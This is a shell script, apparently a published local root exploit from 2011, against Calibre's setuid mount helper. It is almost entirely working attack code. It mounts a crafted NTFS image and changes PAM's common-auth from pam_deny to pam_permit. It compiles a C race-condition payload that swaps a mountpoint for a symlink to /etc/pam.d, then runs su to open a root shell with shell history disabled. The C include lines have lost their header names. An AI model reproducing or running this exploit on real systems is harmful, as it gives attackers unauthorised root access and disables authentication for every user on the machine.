#!/bin/sh ########################################### # .70-Calibrer Assault Mount # # by Dan Rosenberg (@djrbliss) and zx2c4 # ########################################### ################################################################################ # Yesterday we learned how Calibre's ability to mount anything anywhere resulted # in a local root. Today's exploit shows a race condition to subvert recent # changes preventing symlinks and checking path prefixes. # # - djrbliss & zx2c4 # 2011-11-3 ################################################################################ overlay=/dev/shm/overlay staging=/media/staging mounter=calibre-mount-helper fakemount=/media/staging/fake target=/etc/pam.d mkfsntfs=/sbin/mkfs.ntfs echo "[+] Making overlay image:" dd if=/dev/zero of=$overlay count=51200 $mkfsntfs -F $overlay echo "[+] Mounting overlay image using calibre-mount-helper." $mounter mount $overlay $staging echo "[+] Copying /etc/pam.d/ into overlay." cp /etc/pam.d/* $staging/ 2>/dev/null sed -i "s/pam_deny.so/pam_permit.so/g" $staging/common-auth echo "[*] Making fake mountpoint." rm -rf $fakemount 2>/dev/null echo "[*] Preparing binary payload..." cat > /tmp/pwn.c << _EOF #include #include #include int main(int argc, char **argv) { int fd, wd, ret; if (fork()) { fd = inotify_init(); unlink("$fakemount"); mkdir("$fakemount"); wd = inotify_add_watch(fd, "$fakemount", IN_CREATE); read(fd, 0, 0); rename("$fakemount", "$staging/tmp"); symlink("$target", "$fakemount"); rmdir("$staging/tmp"); return 0; } else { sleep(1); return system("$mounter mount $overlay $fakemount"); } return 0; } _EOF gcc /tmp/pwn.c -o /tmp/pwn ret=1 while [ $ret -ne 0 ]; do /tmp/pwn ret=$? done; sleep 2 echo "[+] Asking for root. When prompted for a password, type anything and press enter." su -c "echo \"[+] Cleaning up.\"; umount $fakemount; umount $staging; rm -rf $overlay; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh"